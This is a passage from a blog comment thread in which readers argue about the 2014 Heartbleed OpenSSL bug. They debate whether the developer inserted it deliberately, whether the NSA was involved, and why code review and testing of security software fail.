We know who’s responsible for committing the problem code 2 yrs ago. It was a German developer:
http://www.smh.com.au/it-pro/security-it/man-who-introduced-serious-heartbleed-security-flaw-denies-he-inserted-it-deliberately-20140410-zqta1.html
different-church-lady
@Carolinus: Oh, that’s easy: we just add a pinch of argle-bargle and we get “Seggelmann’s an NSA agent” goulash.
Carolinus
@efgoldman:
Ack! Sorry about that. I clicked reply on the wrong post. The post that blockquote was from was #90 (Nathanael’s), one up from the post of yours I incorrectly replied to. I’d fix it if I could still edit it. Again, my apologies.
Anton Sirius
@the Conster:
Sorry, that’s utter bullshit.
You want to believe the NSA knew about it and exploited it? Fine, it’s possible.
You want to believe the NSA created it? The lizard people are waiting fnord you behind door number two, OPE POE EOP. Do not adjust your set.
Anton Sirius
@Cervantes:
I’m thinking about forgiveness.
Mandalay
@Robert Sneddon:
Sure it was potentially a very serious problem, but there’s no need to be a condescending know-it-all about it. You are talking about a bug in a piece of code that may have been executed trillions of times, and was only just discovered after two and a half years. There is the possibility that a “bad guy”, or even the NSA, had previously discovered it, but there is no evidence of that to date.
Unless you have actually looked at the code that was written you simply cannot know that to be true. And the person who wrote the code states that it was a validation error.
Stop trying to prove that you are the smartest guy in the room. You are having the opposite effect.
LT
Does anyone else remember Cheney making a big show of shredding official documents while in office (“like Nixon should have done”)?
He ostentatiously destroyed (circa 2007-2008) public records, within the walls of the official residence of the vice president of the United States. The trucks hired to haul the shredded material away filled the street outside our federal building. Network and cable “news” reported their presence, but not much more. The democratic party didn’t squawk, either. As in “nary a peep” didn’t squawk.
Curious, huh?
AxelFoley
@Schlemizel:
Thanks,
ObamaSnowden.Tripod
Open source community shits bed, blames NSA.
Robert Sneddon
@Mandalay: Anything to do with SSL is mission-critical security code, same with cryptographic modules, certificate handling etc. It should undergo in-depth review, failure analysis and thorough testing before being released. This was just thrown out there and integrated into systems with the assumption it wasn’t wrong, after a demonstrably inadequate review and testing process.
Saying that the SSL heartbeat process isn’t a security issue in itself, any other heartbeat process could have caused the same problem if the same sort of code flaw had been allowed to get through review and testing. I am puzzled as to why the SSL heartbeat had an arbitrary payload, heartbeat processes I’ve written code for (we called them stayawake but they fulfilled the same purpose) used fixed-size fixed-format packets coded as constants so they never used data space RAM for buffering. There are probably good reasons, I’ve not dug that deeply into the documentation.
Cervantes
@Anton Sirius:
That’s nice, I’m sure, but what’s your point?
NonyNony
@Robert Sneddon:
Despite what you’re saying above, this describes almost all of the software on the Internet. Code review is hard, testing is hard, and mistakes happen all of the time. Given the description of the problem and the fact that it’s been two freaking years since it was added to the codebase and nobody caught it – despite the fact that dedicated professional and amateur security professionals hammer SSL code all of the time looking for vulnerabilities – it doesn’t seem to be outside the realm of possibility that it slipped through testing because of a mistake.
Million dollar bugs slip through testing all the time. I suspect that this one only got caught because some folks are being extra super critical about auditing SSL code given the gotofail mess a few months back.
(News flash for the non-programmers out there – most of the code you use is poorly written, poorly understood, and poorly tested before it gets rolled out for public use. And this includes all the security software and all of the financial services software used by your banks and insurance companies. This is why it was a fundamentally stupid mistake to move all financial transactions away from dedicated point-to-point terminals and onto encrypted Internet connections when it was done – the tech wasn’t ready. And really it still isn’t. The algorithms are theoretically sound but they get implemented by human beings and human beings introduce errors. And it is not theoretically possible to prove that your code is error free, so you’re stuck with testing to find bugs. And testing can only find bugs – it can’t prove that your code is correct – and it can only find the bugs that you think to look for. If you don’t think of a particular way a piece of code might fail and write a test for it, you’ll never find the problem. This is why companies that do things like mission critical aircraft software spend a huge chunk of money on testing – to try to find all the ways that code might fail. And if you believe that the banks and insurance companies and other folks who have implemented this software for financial transactions have spent the level of money to develop and test it that, say, Boeing uses to develop and test its mission critical aircraft software that runs airplanes you are mistaken. It’s nowhere close. Testing is always the first thing to get cut when budgets run over and deadlines get missed.)